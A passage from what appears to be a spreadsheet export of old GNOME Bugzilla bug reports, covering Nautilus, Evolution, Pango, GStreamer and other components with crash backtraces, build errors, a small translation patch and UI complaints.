#8  0xff1bff64 in bonobo_ui_toolbar_control_item_construct ()
   from /opt/gnome-1.4/lib/libbonobox.so.2
#9  0xff1c01a8 in bonobo_ui_toolbar_control_item_new ()
   from /opt/gnome-1.4/lib/libbonobox.so.2
#10 0xff1bcc10 in toolbar_build_control ()
   from /opt/gnome-1.4/lib/libbonobox.so.2
#11 0xff1bcea4 in impl_bonobo_ui_sync_toolbar_build ()
   from /opt/gnome-1.4/lib/libbonobox.so.2
---Type  to continue or q  to quit---
#12 0xff1b7f14 in bonobo_ui_sync_build ()
   from /opt/gnome-1.4/lib/libbonobox.so.2
#13 0xff1b323c in bonobo_ui_engine_sync ()
   from /opt/gnome-1.4/lib/libbonobox.so.2
#14 0xff1b37a4 in bonobo_ui_engine_update_node ()
   from /opt/gnome-1.4/lib/libbonobox.so.2
#15 0xff1b3b8c in bonobo_ui_engine_update ()
   from /opt/gnome-1.4/lib/libbonobox.so.2
#16 0xff1b4414 in bonobo_ui_engine_thaw ()
   from /opt/gnome-1.4/lib/libbonobox.so.2
#17 0x6f8fc in ui_idle_handler (data=0x19f4a8) at nautilus-window.c:254
#18 0xfe5c7b7c in g_idle_dispatch () from /opt/gnome-1.4/lib/libglib-1.2.so.0
#19 0xfe5c61b4 in g_main_dispatch () from /opt/gnome-1.4/lib/libglib-1.2.so.0
#20 0xfe5c6a78 in g_main_iterate () from /opt/gnome-1.4/lib/libglib-1.2.so.0
#21 0xfe5c7344 in g_main_run () from /opt/gnome-1.4/lib/libglib-1.2.so.0
#22 0xfe8cbad0 in gtk_main () from /opt/gnome-1.4/lib/libgtk-1.2.so.0
#23 0xff2cbb4c in bonobo_main () from /opt/gnome-1.4/lib/libbonobo.so.2
#24 0x3f448 in main (argc=1 argv=0xffbeea44) at nautilus-main.c:283
(gdb) q
The program is running.  Exit anyway? (y or n) y
pepper 11 %
----------------------------------------
i also have a truss file but it's 15mb so if you want it - send me a mail and
i'll forward it on: peter.foley@ireland.sun.com
------- Additional Comments From peter.foley@ireland.sun.com 2001-06-28 05:48:41 ----
the patch included in bug 96270 appears to fix this crash....
I have been trying to mark this bug as duplicate of bug 96270 in
bugzilla.gnome.org but cannot.....but that's in a seperate database so i keep
getting errors....so i'm marking it as FIXED...
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
</t>
  </si>
  <si>
    <t>shane.oconnor</t>
  </si>
  <si>
    <t>GCONF-90496</t>
  </si>
  <si>
    <t>gconf</t>
  </si>
  <si>
    <t>GCONF</t>
  </si>
  <si>
    <t>gconf_value_copy should be const</t>
  </si>
  <si>
    <t>AFAICT gconf_value_copy shouldn't change the source GConfValue argument
therefore I think the argument should be const.
PS I'm using version 1.0.9 but it doesn't appear in the bugzilla version menu.</t>
  </si>
  <si>
    <t>gconf-maint</t>
  </si>
  <si>
    <t>tony</t>
  </si>
  <si>
    <t>GAL-215475</t>
  </si>
  <si>
    <t>ETree</t>
  </si>
  <si>
    <t>Folder Bar keeps recentering on current folder</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Steps to reproduce the problem:
1. Start evolution
2. Create enough folders and sub folders to produce a scroll bar on the
   Folder Bar (set to view Folder Bar)
3. select the bottom most folder and then try moving messages to
   the top folder
Actual Results:
Whenever you do just about anything the Folder Bar recenters itself
so that the currently selected folder tree item is visible.
Expected Results:
Once I manually scroll the Folder Bar to a new position such that the
currently selected folder is no longer visible in the viewport I would
not expect the Folder Bar to recenter itself everytime I activate or
do something.
It is really quite annoying when you have as many folders as I do and
manually sort as much mail as I do.
How often does this happen? 
Everytime.
Additional Information:
Things with scroll bars in general should never automagically
change the scrolled position unless the some important information
has changed and a repositioning of the scroll is necessary to bring
that change to the attention of the user.
For instance if the number of new messages in a folder changed I
wouldn't be surprised if the window repositioned itself to bring
that information to my attention.
But when I'm simply moving message from the subject window to the
Folder Bar no information as displayed by the Folder Bar is altered.
Therefore no change should occur to the Folder Bar.</t>
  </si>
  <si>
    <t>PANGO-150522</t>
  </si>
  <si>
    <t>GSUB lookup is too slow</t>
  </si>
  <si>
    <t>Fonts with big GSUB tables take a prohibitably long time to render with the
current GSUB lookup code in pango. E.g. the font SBL Hebrew reaches the
following code in ftxgsub.c :
      for ( j = 0 j &lt; feature.LookupListCount j++ )
and at this stage LookupListCount ~ 2100 . This code appear to be reached at
least for every run in the PangoLayout. 
This occured when I added a call to pango_ot_ruleset_substitute() to hebrew-fc.c
in order to use the fonts GSUB table.
I still don't understand the code but it seems to me that LookupList must be
turned into a hash table.</t>
  </si>
  <si>
    <t>pango-maint</t>
  </si>
  <si>
    <t>dov.grobgeld</t>
  </si>
  <si>
    <t>EVOLUTION-364385</t>
  </si>
  <si>
    <t>column headers for message list are drawn as buttons</t>
  </si>
  <si>
    <t>Display the column headers as gtk headers. They look ugly when drawn as buttons with some themes. This would lead to a more consistent UI.
Other information:
This bug has been filed under https://launchpad.net/distros/ubuntu/+source/evolution/+bug/62131 where you can find additional screenshots.</t>
  </si>
  <si>
    <t>andreruediger</t>
  </si>
  <si>
    <t>PAN-351258</t>
  </si>
  <si>
    <t>[0.108] Updated french translation</t>
  </si>
  <si>
    <t>First of all thanks for the great new features of Pan 0.108.
So here is a new up to date fr.po.
Added browser new features and lines from bug 351244 (save-ui.cc)
I think it will not be modified until next pan release. Thanks for your great work. I love Pan more and more at each new release )</t>
  </si>
  <si>
    <t>fredbezies</t>
  </si>
  <si>
    <t>BONOBO-126634</t>
  </si>
  <si>
    <t>libbonoboui</t>
  </si>
  <si>
    <t>BONOBO</t>
  </si>
  <si>
    <t>Bonobo Toolbar Keynavigation</t>
  </si>
  <si>
    <t>using a gnome-2.4 build from 10 Nov 2003
-launch nautilus
-keep pressing  to cycle through focusable widgets
actual:
only the 'back' button is focusable through keynav
expected:
the entire toolbar is focusable through keynav</t>
  </si>
  <si>
    <t>SEAHORSE-479500</t>
  </si>
  <si>
    <t>SEAHORSE</t>
  </si>
  <si>
    <t>Password tab not displaying any password</t>
  </si>
  <si>
    <t>I don't know if that's a bug or not and maybe I'm just mis-interpreting things here.
I expect the password tab to show the content of the keyring or at least a good bunch of its content. But it's empty.
However in gnome-keyring-manager I can see 10 items in the default keyring. 5 of those are for remote servers and the other 5 are just passwords.</t>
  </si>
  <si>
    <t>seahorse-maint</t>
  </si>
  <si>
    <t>LSR-376087</t>
  </si>
  <si>
    <t>user interface</t>
  </si>
  <si>
    <t>LSR</t>
  </si>
  <si>
    <t>Firefox Perk option to bound review keys</t>
  </si>
  <si>
    <t>Have an option to bound the review keys to the current document or not. Some users report problems walking out of a document.</t>
  </si>
  <si>
    <t>EVOLUTION-311474</t>
  </si>
  <si>
    <t>tool tip under the copy icon shows up wrong</t>
  </si>
  <si>
    <t>Version details: 2.3.5
Distribution/Version: SuSE 9.3
1. Move the mouse onto the copy push-button in the toolbar. It shows a tool tip
saying 'Copy selected messages to another folder'
But for move it is 'Move selected message(s) to another folder'
The tooltip that shows up for the copy button should be changed to be similar to
the tooltip for move.</t>
  </si>
  <si>
    <t>shilpa.venkat</t>
  </si>
  <si>
    <t>GSTREAMER-164235</t>
  </si>
  <si>
    <t>swfdec0 claimed state-change successbut state didn't change to PAUSED. State is READY (PAUSED pending) fix the element</t>
  </si>
  <si>
    <t>trying to play a flahs animation with decodebin
gst-launch-0.8 -vvv filesrc location=file.swf ! decodebin ! xvimagesink
fails:
RUNNING pipeline ...
/pipeline0/filesrc0.src: caps = application/octet-stream
/pipeline0/decodebin0/typefind.sink: caps = application/octet-stream
/pipeline0/filesrc0.src: active = TRUE
/pipeline0/decodebin0/typefind.sink: active = TRUE
/pipeline0/decodebin0/typefind.src: active = TRUE
/pipeline0/decodebin0/swfdec0.audio_00: active = TRUE
/pipeline0/decodebin0/swfdec0.video_00: active = TRUE
ERROR: from element /pipeline0/xvimagesink0: Internal GStreamer error: state
change failed.  File a bug.
(process:26189): GStreamer-WARNING **: element swfdec0 claimed state-change
successbut state didn't change to PAUSED. State is READY (PAUSED pending) fix
the element
/pipeline0/decodebin0/typefind.src: caps = application/x-shockwave-flash
/pipeline0/decodebin0/swfdec0.sink: caps = application/x-shockwave-flash
/pipeline0/filesrc0.src: active = FALSE
/pipeline0/decodebin0/typefind.sink: active = FALSE
/pipeline0/decodebin0/typefind.src: active = FALSE
(process:26189): GStreamer-WARNING **: element swfdec0 claimed state-change
successbut state didn't change to PAUSED. State is READY (PAUSED pending) fix
the element
/pipeline0/decodebin0/typefind.sink: active = TRUE
/pipeline0/decodebin0/typefind.src: active = TRUE
(process:26189): GStreamer-WARNING **: element swfdec0 claimed state-change
successbut state didn't change to PAUSED. State is READY (PAUSED pending) fix
the element
Execution ended after 2 iterations (sum 73862000 ns average 36931000 ns min
143000 ns max 73719000 ns).
/pipeline0/decodebin0/typefind.sink: active = FALSE
/pipeline0/decodebin0/typefind.src: active = FALSE
(process:26189): GStreamer-WARNING **: element swfdec0 claimed state-change
successbut state didn't change to PAUSED. State is READY (PAUSED pending) fix
the element
/pipeline0/decodebin0/typefind.sink: active = TRUE
/pipeline0/decodebin0/typefind.src: active = TRUE
(process:26189): GStreamer-WARNING **: element swfdec0 claimed state-change
successbut state didn't change to PAUSED. State is READY (PAUSED pending) fix
the element
/pipeline0/decodebin0/typefind.sink: active = FALSE
/pipeline0/decodebin0/typefind.src: active = FALSE
(process:26189): GStreamer-WARNING **: element swfdec0 claimed state-change
successbut state didn't change to PAUSED. State is READY (PAUSED pending) fix
the element
/pipeline0/decodebin0/typefind.sink: active = TRUE
/pipeline0/decodebin0/typefind.src: active = TRUE
(process:26189): GStreamer-WARNING **: element swfdec0 claimed state-change
successbut state didn't change to PAUSED. State is READY (PAUSED pending) fix
the element
/pipeline0/decodebin0/typefind.sink: caps = NULL</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-163582</t>
  </si>
  <si>
    <t>Should limit length of description</t>
  </si>
  <si>
    <t>Bug-buddy can produce stack traces which are very long. When such a description
exceeds the allowed size of the MySQL field the bug is created without a
description. For an example see bug 163500.
Note that although the description of this bug (around 2.5MB) didn't exceed the
allowed size of the field the size is also limited to the max_allowed_packet
variable.
Bug 163500 contains an stack trace with around 24000 functions. This exceeds the
allowed field size (or more likely the max_allowed_packet) and causes the bug
creation to be aborted half-way.
The error logged in $HOME/submit.log:
MySQL server has gone away at globals.pl line 278
(includes the initial bug description)
Suggest to limit the maximum text in bug-buddy-import.pl. If possible a warning
should be produced (added to the current warnings like invalid version).</t>
  </si>
  <si>
    <t>bugzilla-gnome</t>
  </si>
  <si>
    <t>GNOME-PANEL-75935</t>
  </si>
  <si>
    <t>Move mode keynav problems</t>
  </si>
  <si>
    <t>Once in move mode arrow keys should move the object using the default move
mode (which I think is always 'free movement' in 2.0).  Currently they
move focus around the panel while you remain in move mode which is just
totally broken.
Pressing Enter should confirm the move and exit move mode.  It should not
activate the object you've just moved.  Currently it not only activates the
object but also keeps you in move mode even though the cursor changes to
indicate otherwise.  This prevents further interaction with the panel until
you click on the object you've just moved with the keyboard.</t>
  </si>
  <si>
    <t>DOXYGEN-306231</t>
  </si>
  <si>
    <t>Fix in translator_jp.h/trWriteList()</t>
  </si>
  <si>
    <t>Index: src/translator_jp.h
===================================================================
RCS file: /u/kp3softd/cvsroot/src/translator_jp.hv
retrieving revision 1.49
diff -u -r1.49 translator_jp.h
--- src/translator_jp.h	11 Jan 2005 19:39:24 -0000	1.49
+++ src/translator_jp.h	2 Jun 2005 07:50:48 -0000
@@ -66112 +6617 @@
                                    // (order is left to right)
         if (i!=numEntries-1)  // not the last entry so we need a separator
-        {
-          if (i&lt;numEntries-2) // not the fore last entry
-            result+=decode( )
-          else                // the fore last entry
-            result+=decode( ã¨ )
-        }
+	  result+=decode(ãƒ»)
       }
       return result
     }</t>
  </si>
  <si>
    <t>hermit</t>
  </si>
  <si>
    <t>GIMP-85203</t>
  </si>
  <si>
    <t>flattening an image with 'overlay' mode layer creates garbage</t>
  </si>
  <si>
    <t>If you flatten an image that has a layer mode set to 'overlay' it will
create some weird garbage for that layer. Attached is a sample image and
the result.</t>
  </si>
  <si>
    <t>YELP-431077</t>
  </si>
  <si>
    <t>Man Pages</t>
  </si>
  <si>
    <t>YELP</t>
  </si>
  <si>
    <t>handle location of posix man pages better</t>
  </si>
  <si>
    <t>At least on fedora the posix man pages (sections 1p 3p etc) are located in 
separate directories. Here is a patch to handle this. This makes
yelp man:pthread_setspecific(3p) 
work.</t>
  </si>
  <si>
    <t>yelp-maint</t>
  </si>
  <si>
    <t>EVOLUTION-241224</t>
  </si>
  <si>
    <t>spacing/padding of alarm notify dialog</t>
  </si>
  <si>
    <t>Please see http://bugzilla.gnome.org/show_bug.cgi?id=241001 for a complete
list of the hig spacing/padding requirements for gnome2 apps. The gist of
this is that the alarm notify dialog needs some additional
spacing and padding namely: 
1. The padding between the contents of the dialog and the window border
should be 12 px.
2. The spacing between the various widgets in the dialog should be 6px.</t>
  </si>
  <si>
    <t>anna</t>
  </si>
  <si>
    <t>NAUTILUS-316117</t>
  </si>
  <si>
    <t>Views: Icon View</t>
  </si>
  <si>
    <t>Pressing Down Arrow Key in Icon View doesn't get you to view last items in some case</t>
  </si>
  <si>
    <t>Please describe the problem:
Hi
If you are navigating a folder(spatial/icon view) by pressing MOVE DOWN until
reach end of folder when you think you reach it maybe you don't if there are
no icon just below the one that's highlighted you have to pay attention to
vertical scroll bar to notice there are still more files in the folder.
The selected item in the screenshot if I press MOVE DOWN I will stay in the
same place instead of reach the remaining files that I know they exists due to
the vertical scroll bar.
I found several bugs about general remake of icon view but none specific to
this bug. So if you like you could mark this as a duplicate of those more
general bugs.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>PYGTK-163612</t>
  </si>
  <si>
    <t>gtk</t>
  </si>
  <si>
    <t>segmentation fault on pygtk-demo</t>
  </si>
  <si>
    <t>Please describe the problem:
While running pygtk-demo and trying a sample widget a segmentation fault is raised
Steps to reproduce:
Run the pygtk-demo and click whatever sample widget on the left
Actual results:
Expected results:
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>gianmt</t>
  </si>
  <si>
    <t>EVOLUTION-235891</t>
  </si>
  <si>
    <t>IMAP access errors</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 1.2.1
Synopsis: IMAP access errors
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I've been getting random IMAP access errors when viewing messages. I'll
select a message and get an error like:
Error while 'Retrieving message 13013':
Cannot get message: 13013
No such message
I'm running evolution-mail in debug mode and I don't see any fetching
activity when this occurs.
If I run killev and restart (sometimes after a few times of doing this)
the mail access works again.
I'm not sure if this is relevant or not but I'm accessing the mail via
an ssh tunnel so the mailserver name is in hostname:port format in my
configuration. The ssh tunnel is still active when I run into this
problem- I can telnet to the port and manually issue IMAP commmands.
Unknown reporter: woneill@pobox.com changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>woneill</t>
  </si>
  <si>
    <t>LIBGNOMEDB-69932</t>
  </si>
  <si>
    <t>widgets</t>
  </si>
  <si>
    <t>LIBGNOMEDB</t>
  </si>
  <si>
    <t>Data source selector widget</t>
  </si>
  <si>
    <t>A widget for selecting a data source amongst the available ones. As soon as
it is done modify GnomeDbLogin and the GNOME-DB components to make use of it.</t>
  </si>
  <si>
    <t>EPIPHANY-114272</t>
  </si>
  <si>
    <t>Crash on closing popup window</t>
  </si>
  <si>
    <t xml:space="preserve">Package: epiphany
Severity: normal
Version: 0.6.1
Synopsis: Crash on closing popup window
Bugzilla-Product: epiphany
Bugzilla-Component: General
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
Pressed back to return to footnotes website from xd2 eweek article a
popup window opened up (I have popups disabled in gconf) tried to close
popup epiphany crashed
Debugging Information:
Backtrace was generated from '/usr/bin/epiphany'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New
Thread 16384 (LWP 716)]
[New Thread 32769 (LWP 718)]
[New Thread 16386 (LWP 719)]
[New Thread 32771 (LWP 720)]
[New Thread 49156 (LWP 723)]
[New Thread 327699 (LWP 21468)]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0x40ba4af9 in wait4 () from
/lib/libc.so.6
#0  0x40ba4af9 in wait4 () from /lib/libc.so.6
#1  0x40c17f60 in sys_sigabbrev () from /lib/libc.so.6
#2  0x40996061 in waitpid () from /lib/libpthread.so.0
#3  0x402589fa in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x4099775a in __pthread_sighandler () from /lib/libpthread.so.0
#5  0x40b319c8 in sigaction () from /lib/libc.so.6
#6  0x4048856f in gtk_false () from /usr/lib/libgtk-x11-2.0.so.0
#7  0x4048826d in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#8  0x4061264a in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#9  0x409fb44f in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#10 0x409fc369 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#11 0x409fc66f in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#12 0x409fccbe in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#13 0x406d95d1 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#14 0x08072fe0 in main ()
#15 0x40b20a51 in __libc_start_main () from /lib/libc.so.6
Thread 6 (Thread 327699 (LWP 21468)):
#0  0x40b31ad2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40993f35 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40990f05 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401458f9 in PR_WaitCondVar () from /usr/lib/mozilla/libnspr4.so
No symbol table info available.
#4  0x400daacf in nsThreadPool::GetRequest(nsIThread*) ()
   from /usr/lib/mozilla/libxpcom.so
No symbol table info available.
#5  0x400db316 in nsThreadPoolRunnable::Run() ()
   from /usr/lib/mozilla/libxpcom.so
No symbol table info available.
#6  0x400d9b79 in nsThread::Main(void*) () from
/usr/lib/mozilla/libxpcom.so
No symbol table info available.
#7  0x4014a499 in PR_Select () from /usr/lib/mozilla/libnspr4.so
No symbol table info available.
#8  0x40991d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 49156 (LWP 723)):
#0  0x40b31ad2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40993f35 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40990f05 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401458f9 in PR_WaitCondVar () from /usr/lib/mozilla/libnspr4.so
No symbol table info available.
#4  0x400dd3c1 in TimerThread::Run() () from
/usr/lib/mozilla/libxpcom.so
No symbol table info available.
#5  0x400d9b79 in nsThread::Main(void*) () from
/usr/lib/mozilla/libxpcom.so
No symbol table info available.
#6  0x4014a499 in PR_Select () from /usr/lib/mozilla/libnspr4.so
No symbol table info available.
#7  0x40991d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 32771 (LWP 720)):
#0  0x40b31ad2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40993f35 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40990f05 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401458f9 in PR_WaitCondVar () from /usr/lib/mozilla/libnspr4.so
No symbol table info available.
#4  0x40f2e929 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
No symbol table info available.
#5  0x40f2e355 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
No symbol table info available.
#6  0x400d9b79 in nsThread::Main(void*) () from
/usr/lib/mozilla/libxpcom.so
No symbol table info available.
#7  0x4014a499 in PR_Select () from /usr/lib/mozilla/libnspr4.so
No symbol table info available.
#8  0x40991d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 16386 (LWP 719)):
#0  0x40bc7248 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x401490c4 in PR_OpenDir () from /usr/lib/mozilla/libnspr4.so
No symbol table info available.
#2  0x40f2588a in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
No symbol table info available.
#3  0x40f26049 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
No symbol table info available.
#4  0x400d9b79 in nsThread::Main(void*) () from
/usr/lib/mozilla/libxpcom.so
No symbol table info available.
#5  0x4014a499 in PR_Select () from /usr/lib/mozilla/libnspr4.so
No symbol table info available.
#6  0x40991d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 32769 (LWP 718)):
#0  0x40bc7248 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40991a8e in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 16384 (LWP 716)):
#0  0x40ba4af9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40c17f60 in sys_sigabbrev () from /lib/libc.so.6
No symbol table info available.
#2  0x40996061 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x402589fa in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x4099775a in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x40b319c8 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x4048856f in gtk_false () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#7  0x4048826d in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#8  0x4061264a in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#9  0x409fb44f in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x409fc369 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0x409fc66f in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#12 0x409fccbe in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#13 0x406d95d1 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#14 0x08072fe0 in main ()
No symbol table info available.
#15 0x40b20a51 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x40ba4af9 in wait4 () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-06-02 14:39 -------
Reassigning to the default owner of the component mpeseng@tin.it.
</t>
  </si>
  <si>
    <t>mrroach</t>
  </si>
  <si>
    <t>EVOLUTION-256746</t>
  </si>
  <si>
    <t>shortcuts need love</t>
  </si>
  <si>
    <t>This bug report is slightly pre-emptive but I'm about to commit the
new New button stuff and it's been pointed out that some of the
shortcuts I was going to use are already in use. So we need to figure
out new non-conflicty ones.
The shortcuts for the New button items are defined in:
    mail/mail-component.c
    addressbook/gui/component/addressbook-component.c
    calendar/gui/calendar-component.c
    calendar/gui/tasks-component.c
search for get_userCreatableItems and modify the menuShortcut
fields (and/or the accelerators in the menuDescriptions)</t>
  </si>
  <si>
    <t>evolution-product-design-bugs</t>
  </si>
  <si>
    <t>SEAHORSE-356021</t>
  </si>
  <si>
    <t>tab labels</t>
  </si>
  <si>
    <t>The labels of the main application tabs are name Key I trust My personal Keys Keys I've collected. It would be much better to use an unpersonal form like Trusted Keys Personal Keys Collected Keys (or All Keys).
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-248599</t>
  </si>
  <si>
    <t>vFolder of important mail doesn't update count</t>
  </si>
  <si>
    <t>Description of Problem:
I have a vFolder that shows mail which has the
status important.
On the Summary page I have chosen to show this
Important Mail folder so that I can always see
how many e-mails I have marked as important.
However when I am done with an important mail and
therefore remove the important status the count on
the frontpage is not updated.
IfI restart Evolution the count is correct again.
When new mail are marked as important the count is
updated correctly.
Steps to reproduce the problem:
0. Make a vFolder on status is important
1. Add this folder to the mail section of the summary
2. Mark a couple of e-mails Important
3. Go to the vFolder and remove the important
status from an e-mail
4. Notice that the count on the summary page is
still n and not n-1 as it should be
Actual Results:
Mail count not updated
Expected Results:
Mail count updated correctly
How often does this happen? 
Always
Additional Information:
Evolution 1.4.4 installed through Red Carpet on
RedHat 9</t>
  </si>
  <si>
    <t>GTHUMB-157761</t>
  </si>
  <si>
    <t>cannot resize the columns in the find duplicates dialog of gthumb</t>
  </si>
  <si>
    <t>When the width autoadjusts for long filenames the width of all the columns is
too wide for the default window width.</t>
  </si>
  <si>
    <t>GTK+-392646</t>
  </si>
  <si>
    <t>.General</t>
  </si>
  <si>
    <t>Fix cross-compilation</t>
  </si>
  <si>
    <t>Attached patch fixes creation of gtkbuiltincache.h when cross-compiling and couple of win32 problems with builddir != srcdir.
Note that GDK_PIXBUF_CSOURCE check in configure.in must stay there because demo/Makefile.am uses it for something.</t>
  </si>
  <si>
    <t>GNOME-VFS-347212</t>
  </si>
  <si>
    <t>2.15.2 tarball doesn't compile if libacl-dev is not installed</t>
  </si>
  <si>
    <t>The tarball fails to compile:
file-method-acl.c: In function 'string_to_uid':
file-method-acl.c:195: warning: assignment makes pointer from integer without a cast file-method-acl.c:198: error: dereferencing pointer to incomplete type
file-method-acl.c: In function 'string_to_gid': file-method-acl.c:207: warning: assignment makes pointer from integer without a cast file-method-acl.c:210: error: dereferencing pointer to incomplete type
make: *** [file-method-acl.lo] Erreur 1
Note that I have this in config.h:
/* Define to 1 if you have the  header file. */
/* #undef HAVE_GRP_H */
After looking at the configure.in file I installed libacl1-dev and reconfigured. Now it compiles. Something is broken :-) (it checks for grp.h only if the acl library is detected but the acl code is always compiled or something like this)</t>
  </si>
  <si>
    <t>EEL-150344</t>
  </si>
  <si>
    <t>Cleanup of issues reported by sparse</t>
  </si>
  <si>
    <t>EVOLUTION-214074</t>
  </si>
  <si>
    <t>Editing fields under the Colaboration LDAP contact</t>
  </si>
  <si>
    <t>When using the Contact Editor to create/modify entries on an LDAP server 
the two fields under the Collaboration tab cannot be committed to LDAP 
server.  After doing some rudimentary investigation it seems like these 
fields aren't even supported by the extended evolutionPerson schema.  This 
would indicate that you can't actually write them to the LDAP server.  To 
be consistent with the rest of the UI the labels for the two fields 
(Public Calendar URL and Free/Busy URL) should appear grayed out.  I 
believe that this shouldn't be too difficult to fix in the code.</t>
  </si>
  <si>
    <t>toshok</t>
  </si>
  <si>
    <t>dummy</t>
  </si>
  <si>
    <t>EVOLUTION-254291</t>
  </si>
  <si>
    <t>monthly summary view doesn't accurately reflect multiple calendar sources</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I have three cal sources - my personal calendar my contacts and the evo
roadmap.  However looking at the monthly view (the one on the right hand
side - not the actual calendar view of one month) the only days that are
bolded are those associated with the Evo Roadmap calendar.
I suspect this is a dup but found nothing in my search.</t>
  </si>
  <si>
    <t>GTHUMB-492169</t>
  </si>
  <si>
    <t>Crash when moving directory to trash</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. open gthumb on some picture in some directory
2. move to the parent directory in gthumb
3. select the child directory and move to trash in the contextual menu
Stack trace:
Other information:
see attached patch</t>
  </si>
  <si>
    <t>EVOLUTION-246018</t>
  </si>
  <si>
    <t>cannot paste cut/copied mail into empty folder</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Steps to reproduce the problem:
1)select any message sayin the inbox.
2)click Edit-&gt; Cut
3)The message is now disappeared from the inbox.
4)Go to any other mail folder (say test) which is empty.
5)Click Edit menu.
6)observe that the 'paste' option is disabled. user cannot paste the cut mail.
7)observe that cut message is in the Trash folder.
similarly this happens for the copy operation also.
Actual Results:
usr cannot paste the cut mail 
Expected Results:
usr can paste the cut mail 
How often does this happen? 
Additional Information:</t>
  </si>
  <si>
    <t>antonio.xu</t>
  </si>
  <si>
    <t>YELP-318900</t>
  </si>
  <si>
    <t>tracker bug to fix miscategorized documentation in scrollkeeper</t>
  </si>
  <si>
    <t>Some documents are obviously not filed in a reasonable category in scrollkeeper.
This is a tracker bug that depends on other filed bugs against these programs.
The fix is to change the scrollkeeper category in the .omf.in files.
Scrollkeeper categories are available here:
http://scrollkeeper.sourceforge.net/documentation/categories.html</t>
  </si>
  <si>
    <t>NAUTILUS-304184</t>
  </si>
  <si>
    <t>Thumbnails</t>
  </si>
  <si>
    <t>Move thumbnails when moving files</t>
  </si>
  <si>
    <t>Version details: 2.10.1
Distribution/Version: Ubuntu Breezy Badger
Currently nautilus regenerates all thumbnails when moving files between
different folders instead of just renaming the files in ~/.thumbnails.</t>
  </si>
  <si>
    <t>mikael.olenfalk</t>
  </si>
  <si>
    <t>GTKHTML-269748</t>
  </si>
  <si>
    <t>crash on a double-click on the background of the mail header</t>
  </si>
  <si>
    <t>This bug has been reported here: https://bugzilla.ubuntu.com/3928
If you double click on the background of a mail header evolution
crashes.
Debugging Information:
Backtrace was generated from '/usr/bin/evolution'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
`system-supplied DSO at 0xffffe000' has disappeared keeping its
symbols.
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 1094795648 (LWP 7951)]
[New Thread 1164467120 (LWP 7981)]
[Thread debugging using libthread_db enabled]
[New Thread 1094795648 (LWP 7951)]
[New Thread 1164467120 (LWP 7981)]
